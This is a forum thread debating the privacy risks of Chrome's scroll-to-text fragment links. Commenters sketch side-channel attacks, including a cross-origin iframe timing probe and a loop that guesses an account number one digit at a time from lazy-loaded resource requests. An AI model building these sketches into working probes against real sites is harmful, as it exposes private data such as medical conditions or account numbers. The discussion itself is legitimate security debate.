I always wondered why browser bookmarks don’t just work like this, even if doing so required storing additional metadata outside the URL itself.
One thing that’s interesting about this functionality in Chrome specifically, is that due to the nature of Chrome’s PDF support, these URLs should allow you to deep-link into a PDF from outside it, which hasn’t really been possible before.
Still quite a way from Xanadu transclusions, but it’s a start.
Chrome and other browsers with built-in PDF viewers have long supported the #page=XXX URL syntax to go directly to a specific page of a PDF document.
This sometimes works only when the document is first loaded; if it’s already open in the window or tab, adding a #page fragment in the address bar won’t always turn the page.
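For example, appending the fragment to an ordinary PDF link (example.com is just a placeholder here) opens the document at that page:

  https://example.com/whitepaper.pdf#page=12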
See this Adobe document for other parameters, which aren’t as widely supported:
""Consider a situation where I can view DNS traffic (e.g. company network), and I send a link to the company health portal, with #:~:text=cancer," he wrote. "On certain page layouts, I might be able [to] tell if the employee has cancer by looking for lower-on-the-page resources being requested.""
I thought DNS requests just get the domain, not the hash and not even the page requested.
But let's play along. How would sending a link tell you anything apart from whether a user clicked said link? How would links to existing anchors (e.g. example.com#h3-subtitle) be any different?
Imagine if the page has 10 parts. Part 1 has an image reference hosted on part1.imagehost.xyz, but loaded lazily. Each part has something analogous, an image hosted on a different domain, but loaded lazily (so, no requests before that part of the page is visible).
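As a sketch, a page like that might wire up its lazy loading roughly like this (the domains and the data attribute are made up for illustration):

  // Each part's image lives on its own domain and is only fetched once
  // that part scrolls into view, so the first request to
  // partN.imagehost.xyz reveals that part N became visible.
  const observer = new IntersectionObserver((entries) => {
    for (const entry of entries) {
      if (!entry.isIntersecting) continue;
      const img = entry.target as HTMLImageElement;
      img.src = img.dataset.src!; // e.g. "https://part3.imagehost.xyz/pic.jpg"
      observer.unobserve(img);    // fetch each image at most once
    }
  });
  document.querySelectorAll<HTMLImageElement>("img[data-src]")
    .forEach((img) => observer.observe(img));

An eavesdropper who can see DNS then only has to map domains to parts of the page.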
If this is really an issue worth solving, doesn't it need to be solved for all cases, both traditional #foo links and also these new pattern-style links?
I can understand that this new mechanism will probably increase how often it can happen, but blocking the new mechanism would only solve part of the problem. To solve the whole problem, you'd have to do something like turn off lazy loading.
Anyway, if the reason the person is visiting the page is to read the section about cancer, aren't they going to manually scroll to that section a lot of the time anyway? So the resource will still be loaded, just a little bit later. The scroll bar is moving to that position either way. The only information leaked is who moved it there: the link or the end user.
I've really been missing this kind of functionality. Modern sites are built by people who apparently don't know or care about HTML name anchors. There is still a need to link to specific parts of pages, particularly in online discussions.
The privacy aspect seems insanely overblown to me, for the reasons you outlined.
I do understand why Brendan is using this moment to criticize this. It's on-brand (his Chromium fork has a privacy angle), and it is going to get him exposure because the supposed bad guy is Google. Don't get me wrong, they (Google) are not "good guys" by default any longer. This thing, though? Not so sure. I think it will do more good than harm, on average.
As you can tell, I think that the difference is a real, technically true difference, but the implication is a bit dumb, since authors do not have this kind of thing in mind when deciding whether to anchor. You might as well be mad about lazy image loading too. If a browser is smart enough to only load images near an anchor, then this same risk would have been opened up when that was introduced. (The author wrote the anchor before lazy loading, so they correctly perceived no risk, then lazy loading turned it into a risk.)
AFAIK we can link to any id in the page, not only to anchors. Strictly speaking you're still right because the author creates those ids but some of them are automatically created by frontend or backend frameworks.
I'm going to backpedal a bit on my point about manual scrolling being the same thing as automatically scrolling directly there via anchor.
The scrollbar can be at various positions, and if an anchor takes you there automatically, it jumps to position N, never passing through 0 .. N-1. Whereas if you manually scroll, you pass through all of 0 .. N. So whatever resources are above the target position would not necessarily be loaded with an anchor but probably would with manually scrolling. So the externally observable wire behavior (DNS, IP addresses you connect to, etc.) may still be different.
So if you manually scroll, the adversary can infer that there's something significant about scrollbar position N. It might just be that that's where you lost interest, or it could be that that's what you found interesting, but it's not giving away as direct a clue as jumping straight to position N.
I am not a web dev so I'd love to hear someone with more knowledge spell out some other privacy concerns.
But also I think the main issue "pes10k" has is that it is adding a new attack vector in a backwards-incompatible way. So a sensitive website which is doing these JS lazy-loading things was "safe" last week, but now can potentially leak information in a way it couldn't have with earlier chrome versions.
In practice though it's hard (for me) to think of a website working this way. I understand the idea of a network admin sending the CEO a link with the text fragment "cancer" in it. And if that fires off related requests unusually, I can assume it auto-scrolled to "cancer", conclude the CEO has cancer, and sell all my shares. But what sort of website will dynamically contain the word "cancer" for patients that have cancer and also do fancy lazy-loading stuff? I'm not a security expert though, and I know people can be much cleverer than me when it comes to exploits.
You can't necessarily tell anything from that lone DNS request. But after loading the page, the user's browser will go on to send requests for elements on the page, and anything JS wants to grab based on position, which can be a channel for information.
Example: 99% of your employees' DNS requests to the company health portal are followed by DNS requests to the image CDN a few milliseconds later. However 1 specific request to FakeCompanyHealth.com is immediately followed by a DNS request to MayoClinic.com, because it turns out the web page dynamically loads an iframe to contact the Mayo Clinic once you scroll to the Cancer subsection. You could then assume based on timing that this user clicked a cancer-specific anchor link.
A more realistic example IMO is the Twitter friend-leak one provided in the GitHub thread. Send an anchor like "twitter.com#:~:text=@handle" and see if their page load matches the standard Twitter homepage load, or did their browser scroll them halfway down the page and load additional stuff? If so, you can assume these 2 users are friends.
Edit: Cloudflare has a page to check if ESNI is supported by your browser. I tested it in the latest versions of Firefox, Chrome, and Safari, and it failed the test in all three.
It's still not realistic at all unless you can already snoop on them in some way.
The starting assumption here is "I assume I already violated someone's privacy in a massive way." Like, ok, sure you can violate it a little more in some situations maybe. But does this introduce any new risks in situations where user privacy hasn't already been so massively hijacked?
And since Chrome, along with others, is moving towards encrypted DNS, getting at these DNS lookups will be even less feasible than it is today. You need to actually be able to snoop on all the target's network traffic.
I think what that is saying is: say evil.com starts embedding some sensitive site. It can't normally see the contents of that site, because it would be cross-origin. (Or any other context where I can load a resource but not see its content.) If I want to know whether some content is or is not in that sensitive site, I use the scroll-to-text fragment to scroll to that text: either it will find the text and scroll to it, or it won't. evil.com won't know the result directly, but it might be able to measure timing/CPU work done and, from that, infer the result: whether that text was or was not in the page. From there, repeat the attack to start brute-forcing the content of the page. W.r.t. DNS, if the scrolling or lack of scrolling initiates two different sets of DNS requests that I can observe, then that's one possible way to leak the information on the page.
At least, that's how I'm reading that security doc; this is fairly different from how other responses to your remark are interpreting it, but I wonder if they were only looking at TFA, which really was not very clearly explaining anything.
The security doc also mentions "Restrict feature to user-gesture initiated navigations", which would completely stop the iframe attack I've outlined above.
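For concreteness, here is a rough sketch of that iframe probe as I understand it (entirely hypothetical, the target domain is made up, and this is exactly what the mitigation above is meant to stop):

  // Hypothetical cross-origin probe: load the sensitive page in an
  // iframe with a text-fragment guess, then watch our own main thread
  // for jank that might correlate with scroll/layout work in the frame.
  function probe(guess: string): void {
    const frame = document.createElement("iframe");
    frame.src =
      "https://sensitive.example/#:~:text=" + encodeURIComponent(guess);
    document.body.appendChild(frame);

    let last = performance.now();
    const tick = (now: number) => {
      if (now - last > 50) {
        // A long frame *might* mean the guess matched and a scroll fired.
        console.log(`possible match while probing "${guess}"`);
      }
      last = now;
      requestAnimationFrame(tick);
    };
    requestAnimationFrame(tick);
  }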
So a website with a bad script injected gets loaded by the user, and the script is able to make requests to a logged-in banking website and mount timing-based/scrolling attacks.
I really don't see the issue; to me it's a useless argument.
E.g. on a company network, it would be common to install an SSL cert on all devices on the private network for things like web proxies, CASBs, or other security policy enforcement measures.
The standardization process is meant for reaching agreement among browser makers and to provide clear specs for those features. But it isn't meant for exploration.
That has always been the case. Even Mozilla does it. And if not, then you can't really get the browser vendors to agree on mostly anything a priori, without market validation.
Standardization works as a refinement of already existing work. E.g. Google came up with NaCl/PNaCl, which was basically their own ActiveX; Mozilla responded with asm.js; and the end result was WebAssembly, which is objectively better than both and wouldn't have happened without that prior art.
The W3C doesn't guard what gets implemented in browsers. It never did. And if browser makers willingly participate in the standardization process, we should thank them, because they can always stop doing it. Because really, retreating from the W3C would mean absolutely nothing for computer illiterate people.
But that's beside the point. The W3C haven't been in the driver's seat for a very long time now when it comes to web standards.
Driven by Google, but under the auspices of W3C.
> The W3C haven't been in the driver's seat for a very long time now when it comes to web standards.
That was exactly ghostpepper's point.
At least that has been my understanding of the situation.
Their point is that you can infer the existence of a certain text on a page the user views (even via https) by sending them a link like this and observing the browser loading resources that would be at the bottom of the page. The only reason the browser would do that is if it scrolled to the bottom, confirming the text you put in the link is on the page.
On the other hand, I suspect they probably won't get the mitigations for those real issues right the first time. It's a complicated system they're building, and I think someone will find a clever way to break it.
> A naive implementation of this feature may allow an attacker to determine the existence of textual content across an origin boundary.
Security & privacy implications of that seem obvious, e.g. extracting an account number (or other sensitive information) from a page by searching for successive prefixes.
I just don't think that the DNS query issue mentioned in the article is the thing to be worried about. It's just so much less severe than the fact that DNS isn't encrypted, and requires essentially the same fix.
"Consider a situation where I can view DNS traffic (e.g. company network), and I send a link to the company health portal, with #:~:text=cancer," he wrote. "On certain page layouts, I might be able [to] tell if the employee has cancer by looking for lower-on-the-page resources being requested."
But wow, what an absurd amount of work to almost find something out when you already have access to the entire network, and apparently the WiFi is not secured at all or your targets are all plugged in and on your switch. This is like complaining about a weak combination on a padlock used to secure your screen door.
It requires that the attacker has DNS request visibility and expects that a user will visit a vulnerable page - not necessarily huge barriers to entry.
This could be exploited by targeting a user with an advert that appears in the footer of a webpage, for example, and then obtaining DNS logs for that user after-the-fact.
It's a useful feature certainly; the concern is mainly around the fact that this has essentially been self-certified by the development team and rolled out.
With more ISPs looking to monetize DNS logs, and the future of DNS infrastructure looking a little uncertain at the moment, there does seem to be risk here given that it could become widely deployed.
Scroll-to-text Fragment Navigation - Security Issues
The title of the Forbes article is too hyperbolic for my tastes, and while this could be a security concern in very specific situations, it's being overblown.
Source: was my job to track people and what they do.
Many times I'm looking for an existing anchor for linking to a certain section of the page, because the author did not bother to create a table of contents and many times that anchor ID is missing.
Also — I was under the impression that anything that comes after # is not sent to the server, being a fragment meant to be processed entirely by the client.
What am I missing?
> "Consider a situation where I can view DNS traffic (e.g. company network), and I send a link to the company health portal, with #:~:text=cancer," he wrote. "On certain page layouts, I might be able [to] tell if the employee has cancer by looking for lower-on-the-page resources being requested."
- you visit a page at example.com that contains private data about you (e.g. bank account number, medical conditions, what have you)
- this page loads external resources only when they are scrolled into view
- it also hotlinks some image below the fold that a potentially bad actor can see requests to (maybe the image is on their webserver, maybe you're on a corp network and they can see dns resolutions, whatever)
So now I link you to something like this (hypothetical URL): https://bank.example/account#:~:text=account%20number%3A%201
Did the image get requested? If yes, I know your account number starts with 1; if not, I know it starts with something other than 1. Rinse and repeat.
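A sketch of that "rinse and repeat" loop from the attacker's side; sendLinkToVictim and imageWasRequested are hypothetical stand-ins for "get the victim to open the link" and "check my webserver logs for the hotlinked image":

  // Hypothetical prefix-extraction loop; assumes the victim opens every
  // link and the page lazy-loads an attacker-observable image below the
  // text being probed.
  declare function sendLinkToVictim(url: string): Promise<void>;
  declare function imageWasRequested(): Promise<boolean>;

  async function extractAccountNumber(digits: number): Promise<string> {
    let known = "";
    for (let i = 0; i < digits; i++) {
      for (const d of "0123456789") {
        const guess = `account number: ${known}${d}`;
        await sendLinkToVictim(
          "https://bank.example/account#:~:text=" + encodeURIComponent(guess)
        );
        if (await imageWasRequested()) { // scroll happened => digit matched
          known += d;
          break;
        }
      }
    }
    return known;
  }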
Encrypted DNS is a thing, so snooping on those is non-trivial and not at all something you can be assumed to have access to.
How exactly would you as an attacker perform this rinse and repeat action?
All the security concerns I've seen for this seem quite contrived to me. And I say that as someone who assiduously avoids google products*
(*alas, except at work, because I can't really choose that)
1) Privacy-conscious browsers are trying to get exposure, so they are stretching an extremely narrow privacy risk into something extreme.
2) (I also believe) media companies are worried this will rob them of ad exposures, so they are incentivized to cover this as something scary.
3) The "bad guy" is Google. This means the amplitude of the story is immediately 10X larger.
You aren't missing anything. The article is wrong.
This is especially the case if the browser scrolls and doesn't load all prior resources automatically because they were never "in view".
The scenario you've given is also very similar to a scenario in which the user opens the web page and then manually searches for "cancer". Or scrolls down rapidly until they notice the word "cancer" and then stops. I do that all the time for example.
So I don't see how excluding such a feature protects the user in any way compared with the status quo.
I’m not saying we shouldn’t all be rooting for the other players today and keeping a close eye on Google, just saying there is no way for Google to do nearly as much to hold back the web as MS did back then, even if they wanted to.
Whereas anchors tend to be generic (#preexisting-conditions), this new scroll behavior can be used to create an existence check for any user-specific text on the page (in carefully crafted scenarios). There are probably other variations that could be devised on this concept, since it allows indirect page interaction that can bypass authorization walls (since the browser would transmit cookies normally and such).
I'd like to call myself a privacy advocate, but this is just absurd. The pros obviously outweigh the con of a very precise and targeted attack that leaks a predetermined bit of information.
If you've got their DNS records, you've already violated plenty of their privacy to get the information you want. No need for this text fragment "attack."
Yeah, my read of this is that it has nothing to do with privacy, people who want to block change for some reason have just learned that "i have privacy concerns about google" is a catchword that will get you some press coverage, and are essentially hijacking the actually valid and important privacy concerns to push forward their unrelated opinions (and promote their browser product).
As a FF user, I'd love to see FF implement this too!
This would behave differently depending on whether the browser's user is following @user.
This convinced me not to dismiss the issue.
I'm not sure how that leaks over a side channel.
But I am sure there are governments who take active measures to shape the Internet to their liking, and Twitter has played a significant role in the past in opposing such governments from inside the countries they rule.
So the only way someone could see that you're navigating to a specific fragment is some sort of deep chrome logging, or chrome plugin, etc. And if that's the case, cat's already out of the bag for everything you do already.
At this point, Wikipedia is one of the few websites I use regularly that actually works in this way.
I just went to the most recent github tab in my browser session and found one instantly: https://github.com/quiet/quiet#dependencies
That said, the github one is a sort of interesting case, insofar as they're doing it to avoid user-generated content clashing with their page-chrome ids... while still preserving a readable URI that matches what the content creator expects. Which doesn't seem like an unreasonable case, to me.
I had tested linking to specific comments in issue threads, which does work with JS disabled (unless I've completely messed up...), and assumed that linking to parts of documents, as less complex/application-y would obviously work, but as you've pointed out it doesn't.
That's highly disappointing.
Wouldn't it be nice to have people worry about this while hundreds of other actual privacy-reducing features go unnoticed?
"Consider a situation where I can view DNS traffic (e.g. company network), and I send a link to the company health portal, with [the anchor] #:~:text=cancer. On certain page layouts, I might be able [to] tell if the employee has cancer by looking for lower-on-the-page resources being requested.”
So they could send someone a link to a page with a fragment matching text on it, trick them into clicking it, and watch for the DNS requests of lazy-loaded resources to learn that the text was there.
It's convoluted nonsense.
It took some configuration, but I'm not regretting it at all.
How can you tell a user didn't jitter-scroll and cause more content to show up?
What if it was a 404 page?
How's the intruder able to see the fragment anyway? If the connection isn't secure, all bets are off.
The same argument made about text can be made about words in a domain name.
That seems to complicate things for no good reason.
Though, I'm curious how this works when text is broken apart over spans or divs.
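For what it's worth, the draft spec's full syntax allows a range with optional context, and (as I read it) matching runs against the page's visible text rather than its markup, so inline spans shouldn't break it:

  #:~:text=[prefix-,]textStart[,textEnd][,-suffix]

  e.g. https://example.com/#:~:text=start%20of%20passage,end%20of%20passage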
Something actionable, something specific to my semi-unique position as a developer?
As a developer you, like many of us, might be the family tech support. Switch them to Firefox.
The world's information is merely one click away.
The world's browsers are simply two clicks away.
Dispensing candy is an easy ctrl-triple-click.
Bootstrapping a compiler is just the konami code backwards.
Printing the screen is really as simple as hitting PrtScn and loading your printer with $300 cyan ink cartridges.
However, turning the computer off is a week-long process that involves arguing with the built-in HAL9000.
You won't. Because it didn't work and killed SEO. Then, after years, they silently removed the documentation about it, without providing any way to transition to other approaches without damaging SEO even more; and there was nothing you could do about it, because the server does not receive the data after the hash.
And now Google is trying to force a new standard that is technically broken. Don't use it. It is a trap. It will hurt your SEO sooner or later!
There was another article on this same topic this morning with this:
"Google's engineers have not ignored worries about the security and privacy risks. To their credit, they've gathered them together into a single document and they've clearly been engaged in understanding what people are worried about. It's just that they've concluded the concerns aren't that big a deal or can be dealt with to their satisfaction."
That single document is here, and I went and had a read this morning, but now I get permission denied; I guess it was getting too much attention?
I wish I would've saved a copy now. It had some decent details on the various vulnerabilities and how they are handling (or ignoring) them.